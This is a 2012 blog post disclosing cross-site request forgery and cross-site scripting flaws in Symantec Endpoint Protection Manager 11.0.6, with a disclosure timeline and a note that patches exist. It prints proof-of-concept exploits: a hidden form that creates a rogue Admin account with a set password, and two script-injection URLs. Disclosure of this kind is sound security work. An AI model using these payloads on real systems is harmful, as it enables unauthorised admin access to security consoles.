Saturday, April 28, 2012

Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)

<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />

Cross-Site Scripting (XSS)

  • https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
  • https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>

Symantec has released patches which address these issues. Please see the references for more information.


Vendor URL:

Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - 
Patch released.
2011-08-11 - 
Advisory published by Secunia.

No comments:

Post a Comment